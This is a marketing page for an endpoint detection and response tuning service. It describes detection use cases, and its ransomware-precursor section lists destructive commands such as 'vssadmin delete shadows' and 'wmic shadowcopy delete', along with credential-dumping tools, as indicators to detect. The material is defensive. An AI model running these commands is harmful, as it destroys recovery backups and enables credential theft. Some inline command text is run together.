Endpoint Detection & Response
Endpoint detection and response, tuned to your environment by Ember.
Ember's endpoint detection and response is tuned to your specific environment, not generic out-of-the-box rules that generate noise. It is part of Agentic Security Operations, working across endpoint, cloud, and identity.
How It Works
Your Forward Deployed Engineer (FDE) works alongside Ember across your EDR platform to:
- Tune detection rules to your environment, reducing false positives
- Build custom detections for threats specific to your organization
- Author runbooks for every detection, so your team knows exactly how to respond
- Triage findings and add context before they reach your team
Supported EDR Platforms
| Platform | Full Support | Custom Detections | Managed Response |
|---|---|---|---|
| CrowdStrike Falcon | Yes | Yes | Yes |
| SentinelOne | Yes | Yes | Yes |
| Microsoft Defender for Endpoint | Yes | Yes | Partial |
| Carbon Black | Yes | Partial | Partial |
What Zaun Adds to Your EDR
Beyond Alert Triage
Most tools stop at alert triage. Ember goes further:
- Detection engineering: Custom rules built for your environment
- Runbook documentation: Every detection has a documented response procedure
- Continuous coverage: New detections ship as your environment and the threat landscape change
- Tuning and optimization: Ongoing reduction of false positives
Investigation Transparency
Every finding includes:
- Full evidence trail showing what was analyzed
- Detection logic explanation
- Recommended next steps from the runbook
- Historical context for similar findings
Specific Use Cases
Living-off-the-Land Binary (LOLBin) Abuse
An attacker uses legitimate Windows binaries like certutil.exe, mshta.exe, or regsvr32.exe to download and execute malicious payloads, bypassing application allowlists. Stock EDR rules generate noise on these common admin tools. Ember tunes CrowdStrike Falcon or SentinelOne detections to tell the difference between legitimate admin usage and attacker abuse based on your environment's baseline.
Credential Dumping via LSASS
An attacker attempts to dump credentials from the LSASS process using tools like Mimikatz, comsvcs.dll, or ProcDump. Zaun detects the LSASS access event in CrowdStrike or Microsoft Defender for Endpoint telemetry and correlates it with the parent process, command line arguments, and user context.
Ransomware Precursor Activity
Before deploying ransomware, attackers typically disable security tools, delete shadow copies, and stage data for exfiltration. Zaun builds multi-stage detections in SentinelOne or CrowdStrike that chain together:
vssadmin delete shadowsorwmic shadowcopy delete- Service stop commands targeting backup and security services
- Rapid file enumeration across network shares
- Unusual use of archival tools like
7z.exeorrar.exe
macOS Persistence via LaunchAgent
An attacker installs a LaunchAgent or LaunchDaemon plist on macOS endpoints to maintain persistence. Default EDR rules may not cover non-standard persistence paths. Ember writes custom detections for CrowdStrike Falcon that monitor plist creation in ~/Library/LaunchAgents/ and /Library/LaunchDaemons/ with exclusions for known-good software in your environment.
Lateral Movement via RDP and SMB
After initial compromise, an attacker moves laterally using Remote Desktop Protocol (RDP) or SMB with stolen credentials. Zaun detects unusual RDP login patterns, like a workstation-to-workstation RDP session or RDP from a non-admin user, by analyzing CrowdStrike or Defender authentication telemetry.
Supply Chain Binary Execution
A compromised update for a legitimate tool (e.g., a signed binary from a trusted vendor) executes unexpected child processes or makes network connections to command-and-control infrastructure. Zaun builds detections that baseline expected process trees for your installed software and flag deviations.
Linux Container Escape
An attacker breaks out of a Docker container on a production Linux host by exploiting a kernel vulnerability or misconfigured capabilities. Zaun monitors CrowdStrike Falcon for Linux or SentinelOne for container escape indicators like nsenter usage, chroot calls, or unexpected mount operations from container processes.
Integrations
| Integration | Signal Type | What It Provides |
|---|---|---|
| CrowdStrike Falcon | Endpoint telemetry | Process execution, file writes, network connections, DNS |
| SentinelOne Singularity | Endpoint telemetry | Storyline-based process trees, threat indicators |
| Microsoft Defender for Endpoint | Endpoint telemetry | Process events, network connections, file activity |
| Carbon Black Cloud | Endpoint telemetry | Process execution, binary analysis, network |
| CrowdStrike Falcon Identity | Identity signals | Lateral movement, credential theft, AD changes |
| Slack | Alert delivery | Finding notifications, runbook links, escalation |
| PagerDuty | Incident mgmt | On-call routing, incident creation, escalation |
| Jira | Ticketing | Finding tracking, investigation documentation |
| MITRE ATT&CK | Framework | Detection mapping to techniques and sub-techniques |
Configuration
# Example: EDR monitoring policy
edr:
platform: crowdstrike
monitoring:
- process_execution
- file_modifications
- network_connections
- registry_changes
custom_detections:
enabled: true
auto_deploy: false # Require review before deployment
alerting:
severity_threshold: medium
channels:
- slack: "#security-alerts"
- pagerduty: security-oncallNext Steps
- Cloud Security - Detect risky changes across cloud and SaaS
- Identity + OAuth - Monitor identity threats
- Integrations - Connect your EDR platform